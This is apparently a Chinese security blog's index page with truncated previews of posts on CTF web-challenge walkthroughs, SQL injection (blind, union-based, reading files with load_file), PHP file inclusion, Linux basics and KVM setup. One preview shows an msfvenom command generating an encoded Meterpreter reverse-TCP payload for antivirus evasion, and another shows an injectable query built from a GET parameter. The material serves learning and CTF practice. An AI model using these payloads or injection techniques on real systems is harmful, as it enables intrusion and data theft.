原创 Linux目錄及文件總結

1.文件類型 d 文件夾 - 普通文件 l 鏈接 b 塊設備文件 p 管道文件 c 字符設備文件 s 套接口文件 2.權限 1.權限分配 r 4 可讀權限 w 2 可寫權限 x 1 可執

原创 MSF生成meterpreter及靜態免殺

1.靜態免殺 1.1編譯c文件,靜態免殺 1.1.1 生成shellcode 在kali命令行輸入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i

原创 CTF-04

題目說明:phpinfo 1.打開鏈接後,頁面爲一個phpinfo的頁面,查看URL欄發現這是一個文件包含 2.查看了下phpinfo的信息,沒有什麼可用的信息,頁面源碼,響應頭都沒有可用信息,對網站進行掃描,發現了flag.ph

原创 CTF-08

題目說明:pyscript 1.打開鏈接後,界面如圖所示,提示要輸入密碼並提交 2.重新訪問首頁,並對其抓包–>send to repeater–>go 在響應頭中得到Ciphertext 在響應內容中得到一些題目提示

原创 CTF-03

題目說明:ipspoofing 1.打開鏈接後,來到一個頁面,瀏覽一番,在頁腳發現一個後臺入口administrator,點擊進去 2.在後臺頁面隨意輸入賬號密碼點擊提交,登陸失敗,提示我的ip不在許可範圍內 3.查看頁面源

原创 ubuntu-desktop-14.04.5(32.bit)搭建KVM

KVM(Kernel-based Virtual Machine)支持虛擬機嵌套,基於硬件的虛擬化 環境情況 物理機安裝vmware 在vmware中安裝ubuntu-desktop-14.04.5(32.bit)用以搭建KVM ubu

原创 CTF-07

題目說明:天下武功,唯快不破 1.打開鏈接後,頁面如圖所示 2.這應該是網站根目錄下的index.php的源碼,分析源碼得知: 當訪問index.php文件時,會將flag.php的內容寫到一個txt文件裏, 這個txt文件名

原创 php文件包含漏洞

1.文件包含的原理 1.1爲什麼要使用文件包含 將一些自定義函數或功能寫在一個a文件內,當b文件中要使用到a文件內的一些函數或功能時,b文件只需要包含a文件,這樣b文件就可以直接調用a文件內定義好的函數或一些功能,這樣方便省事。 1.2相

原创 CTF-01

題目說明:robot 1.打開鏈接後,界面就一個機器人圖片,其他啥也沒有 2.根據題目說明,聯想到訪問robots.txt文件 發現在admin目錄下有一個3he11.php文件(此處有一處小坑,文件名中的1很像字母l) 3.

原创 SQL注入-文件操作

1.通過load_file()函數將文件內容爆出來 前提條件 1. 當前權限對該文件可讀 2. 文件在該服務器上 3. 路徑完整 4. 文件大小小於max_allowed_packet 5

原创 SQL注入-盲注

執行SQL查詢,其內容不能直接返回到頁面,那麼可以嘗試盲注 查詢語句 $id=$_GET['id']; SELECT * FROM test WHERE id='$id' LIMIT 0,1; 1. 基於布爾的盲注 通過頁面是否異常來

原创 CTF-06

題目說明:VLD 1.打開鏈接,頁面如圖所示,問我懂不懂VLD 2.查看頁面源碼,提示index.php.txt文件 3.訪問index.php.txt文件,返回的是index.php的操作碼 Finding entry

原创 CTF-02

題目說明:seelog 1.打開鏈接後,就幾個黑字:本站是內部網站,非請勿入 2.純靜態頁面,源碼也無註釋提示,對其進行目錄掃描,發現存在一個log目錄,訪問之 3.訪問後發現該目錄下有兩個日誌文件,根據題目說明,開始審查日誌文

原创 CTF-06

題目說明:get flag 1.打開鏈接,頁面如下 2.點擊Login,頁面如下,是個登陸頁面,有一個加密的驗證碼,驗證碼爲對其進行md5加密後取前六位等於頁面給定的這個字符串 3.編寫python腳本,跑驗證碼 impor

原创 SQL注入-有回顯的注入

1.MySQL相關 在MySQL 5+版本後,加入了information_schema這個庫,該庫存放了所有數據庫的信息 information_schema.columns包含所有表的字段 字段 table_schem